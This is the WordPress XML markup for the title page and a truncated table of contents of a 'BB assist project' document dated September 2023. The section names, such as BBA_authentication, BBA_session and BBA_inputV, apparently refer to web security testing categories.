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16DC" w:rsidRDefault="001916DC" w:rsidP="001916DC">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001916DC" w:rsidRDefault="001916DC" w:rsidP="001916DC">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001916DC" w:rsidRDefault="001916DC" w:rsidP="001916DC">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001916DC" w:rsidRDefault="001916DC" w:rsidP="001916DC">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001916DC" w:rsidRDefault="001916DC" w:rsidP="001916DC">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001916DC" w:rsidRPr="001916DC" w:rsidRDefault="001916DC" w:rsidP="001916DC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001916DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">BB assist project </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001916DC" w:rsidRDefault="001916DC" w:rsidP="001916DC">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001916DC" w:rsidRDefault="001916DC"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p>
    <w:p w:rsidR="004F3AB4" w:rsidRDefault="004F3AB4" w:rsidP="001916DC">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>23 September 2023</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F3AB4" w:rsidRDefault="004F3AB4" w:rsidP="001916DC">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:id w:val="725187278"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w:rsidR="004F3AB4" w:rsidRDefault="004F3AB4">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:rPr>
              <w:rtl/>
              <w:lang w:bidi="fa-IR"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00C21048" w:rsidRDefault="004F3AB4">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:caps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc166500827" w:history="1">
            <w:r w:rsidR="00C21048" w:rsidRPr="00B81304">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Introduction</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc166500827 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C21048" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:caps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc166500828" w:history="1">
            <w:r w:rsidR="00C21048" w:rsidRPr="00B81304">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>BBAP version 1</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc166500828 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C21048" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:smallCaps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc166500829" w:history="1">
            <w:r w:rsidR="00C21048" w:rsidRPr="00B81304">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>BBA_APITesting</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc166500829 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C21048" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:smallCaps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc166500830" w:history="1">
            <w:r w:rsidR="00C21048" w:rsidRPr="00B81304">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>BBA_app</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc166500830 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C21048" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:smallCaps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc166500831" w:history="1">
            <w:r w:rsidR="00C21048" w:rsidRPr="00B81304">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>BBA_authentication</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc166500831 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C21048" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:smallCaps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc166500832" w:history="1">
            <w:r w:rsidR="00C21048" w:rsidRPr="00B81304">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>BBA_authorization</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc166500832 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C21048" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:smallCaps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc166500833" w:history="1">
            <w:r w:rsidR="00C21048" w:rsidRPr="00B81304">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>BBA_businessL</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc166500833 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C21048" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:smallCaps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc166500834" w:history="1">
            <w:r w:rsidR="00C21048" w:rsidRPr="00B81304">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>BBA_Client_side</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc166500834 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C21048" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:smallCaps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc166500835" w:history="1">
            <w:r w:rsidR="00C21048" w:rsidRPr="00B81304">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>BBA_configuration</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc166500835 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C21048" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:smallCaps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc166500836" w:history="1">
            <w:r w:rsidR="00C21048" w:rsidRPr="00B81304">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>BBA_ErrorH</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc166500836 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C21048" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:smallCaps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc166500837" w:history="1">
            <w:r w:rsidR="00C21048" w:rsidRPr="00B81304">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>BBA_identify</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc166500837 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C21048" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:smallCaps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc166500838" w:history="1">
            <w:r w:rsidR="00C21048" w:rsidRPr="00B81304">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>BBA_inputV</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc166500838 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C21048" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:smallCaps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc166500839" w:history="1">
            <w:r w:rsidR="00C21048" w:rsidRPr="00B81304">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>BBA_Report</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc166500839 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C21048" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:smallCaps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc166500840" w:history="1">
            <w:r w:rsidR="00C21048" w:rsidRPr="00B81304">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>BBA_session</w:t>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C21048">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc166500840 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00C21048">
